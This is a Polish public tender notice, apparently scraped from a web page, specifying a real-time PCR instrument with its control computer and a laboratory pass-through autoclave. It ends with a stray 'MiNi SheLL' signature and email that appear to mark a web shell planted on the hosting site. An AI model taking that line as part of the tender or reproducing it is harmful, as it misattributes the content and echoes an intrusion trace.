przeszkolenie pracowników Zamawiającego w jego siedzibie w zakresie obsługi i eksploatacji urządzenia objętego przedmiotem zamówienia;
świadczenie usług serwisowych w okresie gwarancji i rękojmi. 

Oferowane urządzenie musi być fabrycznie nowe, wolne od wad i  aktualnie produkowane na rynku. 
Urządzenie musi być kompletne, gotowe do pracy bez konieczności dodatkowych zakupów. 

Wykonawca zobowiązany jest do dostarczenia własnym transportem i na własny koszt do wskazanego miejsca dostawy oraz rozstawienia, skonfigurowania i uruchomienia przedmiotu zamówienia, a także przeprowadzenia szkolenia pracowników w siedzibie Zamawiającego z zakresu obsługi i oprogramowania przedmiotu zamówienia.
Ilość osób - 15 , 3 dni szkolenia po 7-8 godzin. 

Wymagane parametry:
urządzenie umożliwiające przeprowadzenie ilościowej reakcji PCR w czasie rzeczywistym z użyciem barwników fluorescencyjnych
jednoczesna amplifikacja 96 prób z gwarancją możliwości zwiększenia ilości jednocześnie wykonywanych prób   
	do 384 po dokupieniu bloku. Zmiana bloku z 96 na 384 dołkowy nie może wpływać na zmianę parametrów technicznych urządzenia takich jak ilość kanałów wzbudzenia światła i ilość kanałów detekcji fluorescencji.
archiwizacja amplifikowanego materiału w płytkach 96-384 dołkowych, w których dokonywana jest reakcja PCR
zakres objętości mieszaniny reakcyjnej, w której można przeprowadzić reakcję PCR: 10 - 100?l
prędkość nagrzewania bloku  nie więcej niż 4,5°C na sek
prędkość chłodzenia bloku nie więcej niż 2°C na sek
system detekcyjny - kamera CCD wysokiej czułości
5 kanałów wzbudzenia światła
6 kanałów detekcji fluorescencji
Element wzbudzający - lampa ksenonowa do samodzielnej wymiany przez użytkownika, bez potrzeby wzywania serwisu firmy do laboratorium z monitoringiem czasu pracy
Możliwość samodzielnej wymiany źródła światła (żarówka) przez użytkownika, bez potrzeby wzywania serwisu firmy do laboratorium
System otwarty, umożliwiający analizę kwasów nukleinowych przy pomocy różnych barwników i sond molekularnych:
	SYBR Green I
	Barwnik interkalujący typu LC Green  do analizy HRM (High Resolution Melting)
	Sonda hydrolizująca typu TaqManR
	Sonda Hybrydyzująca typu HybProbeR
	Sonda Simple ProbeR

.Oprogramowanie urządzenia umożliwia wykonanie:
	Pomiar ilości kopii DNA w badanej próbie
	Pomiar poziomu ekspresji genu badanego w stosunku do genu referencyjnego
	Analizy genotypowania - analiza genotypu na podstawie temperatury topnienia produktu
	Analizy Gene Scanning  High Resolution Melting służąca do analizy mutacji (w tym SNP) przy        pomocy specjalnego barwnika interkalującego typu LC Green lub podobny
	Analizy end-point mutation
	Porównania płytek z wynikami dla wszystkich dostępnych aplikacji z uzyskaniem wyniku w oprogramowaniu typu MS Excel
Wykonanie analizy Gene Scanning  High Resolution Melting bez konieczności wprowadzania standardów o znanym genotypie; poszczególne krzywe mogą być łączone w grupy automatycznie, na podstawie swojego podobieństwa
Obserwowanie przeprowadzanej reakcji PCR na bieżąco podczas jej trwania (online)
Oprogramowanie aparatu i baza danych z opcją automatycznego zapisywania informacji o wszystkich zmianach w plikach z otrzymanymi wynikami dokonywanych przez użytkowników aparatu (tzw. traceable database)
Tworzenie plików z podsumowaniem reakcji PCR (m.in. parametry reakcji PCR, wyniki, wykresy) w formacie .pdf
instrukcja pełnej wersji w języku polskim oraz w języku angielskim
pakiet startowy odczynników na minimum 100 reakcji:
	- izolacja RNA i DNA
	- odczynniki do detekcji wirusa grypy AH1N1 typu One step z kontrolą wewnętrzną i kontrolą dodatnią.

wyposażenie dodatkowe do aparatu ww:
komputer do sterowania aparatem i analizy danych polecany przez producenta aparatu
drukarka laserowa kolorowa kompatybilna z zaoferowanym komputerem wraz z zestawem tonerów. 
monitor LCD 17 cali

Intel Pentium Dual Core E2160 Processor 1.8 GHz
RAM 2 GB
2 x Hard Disk 160 GB
NIC Broadcom NetXtreme Gigabit LAN
16x/48 CD-/DVD+/-RW LightScribe Driver
6 x USB 2.0
2 x RJ-45 LAN
2 Serial- + 1 Parallel Port
2 PS/2 (Mouse + Keyboard)
1 VGA analog Video
2 Audio (in/out)
WIN XP Service Pack 2
Windows XP hot fixes up to MS08-078 (17.12.2008)
MS .net Framework Version 2.1.3.1
Symantec pcAnywhere Host Version 12.1.0
Roxio Easy Media Creator Version 10.1.1 Silver
Adobe Reader Version 9
Adobe Flash Player 10.0.12.32






Dodatkowe usługi:
Producent aparatu  musi posiadać jednocześnie w swojej ofercie katalogowej zestawy odczynników (SYBR Green I, odczynnik interkalujący typu LC Green, sondy) dostosowane i zoptymalizowane do pracy na oferowanym aparacie
Producent aparatu musi posiadać w swojej ofercie katalogowej gotowe zestawy  biblioteki sond molekularnych umożliwiających analizę cDNA  DNA człowieka.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II : LBEK - dostawa autoklawu przelotowego (1 sztuka).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poziomy, przelotowy  autoklaw laboratoryjny, pojemność użytkowa 150 l, dwudrzwiowy, wymiary komory: O 500mm-520mm x głębokość 750mm-770mm, waga do 330 kg, wymiary zewnętrzne max: szer. 1020mm-1040mm x wys. 1670mm-1690mm x głęb. 1160mm-1180mm
Całkowicie automatyczny sterownik mikroprocesorowy kontrolujący wszystkie funkcje autoklawu

Automatyczna blokada ciśnieniowa i termiczna drzwi (system niezależny od przerw w zasilaniu elektrycznym)
Inteligentny system blokowania drzwi przeciwległych: po otwarciu drzwi po stronie brudnej uniemożliwia otwarcie drzwi po stronie czystej do momentu zakończenia prawidłowego cyklu sterylizacji
Komunikat na wyświetlaczu sygnalizujący otwarcie drzwi komory po stronie przeciwnej
Elastyczna sonda temperaturowa umieszczana w punkcie (naczyniu referencyjnym z płynem) lub w komorze - do kontroli i sterowania procesem sterylizacji 
14 standardowych programów , w tym program czyszczący , test szczelności i test Bowie-Dicka
Zakres nastawy temperatury sterylizacji 60-140°C, czas sterylizacji 1-300minut, ciśnienie pary do 4 bar , bieżąca temperatura i ciśnienie w komorze autoklawu podczas trwania procesu widoczne na wyświetlaczu
Całkowite oddzielenie wytwornicy pary od komory sterylizacyjnej - pełna gotowość do podawania pary do autoklawu przez cały czas pracy urządzenia
Komora wyposażona w port walidacyjny do wprowadzania sond kontrolnych
Obudowa wykonana ze stali nierdzewnej (kwasoodpornej)AISI 304, komora ciśnieniowa i pokrywa komory  - ze stali tytanowej AISI 316 Ti
Schładzanie kondensatu do 70oC
Autoklaw musi posiadać:
a) drukarka do rejestracji temperatury, ciśnienia i czasu, faz procesu oraz komunikatów
b) system próżniowy, z pompą próżniową bezolejową (uszczelnianą pierścieniem wodnym) do odpowietrzania wsadu metodą próżni frakcjonowanej (min. 5 impulsów próżnia/ciśnienie) oraz do suszenia próżniowego
c) system dekontaminacji powietrza opuszczającego komorę w fazie odpowietrzania, nagrzewania i sterylizacji; wymagany przy pracy z materiałem zakaźnym; zawierający filtr 0,2?m, wyjaławiany każdorazowo w fazie sterylizacji; wyposażony we własną sondę temperaturową Pt100, kontrolującą prawidłowy przebieg sterylizacji
Wymagana walidacja autoklawu w punktach i temperaturach dostosowanych do materiałów i wymogów użytkownika (PQ, 3-krotne pomiary w pustej komorze i 3-krotne pomiary procesu utylizacji odpadów)
Dodatkowe wyposażenie:
- przepływowy demineralizator ze złożem wymienników jonowych do wody procesowej
- konduktometr
- zmiękczacz wody do chłodzenia i pompy próżniowej
Monitorowanie procesów sterylizacji
Instrukcja obsługi w języku polskim
Certyfikat CE dołączony do oferty
Menu w języku polskim.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.11.10-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com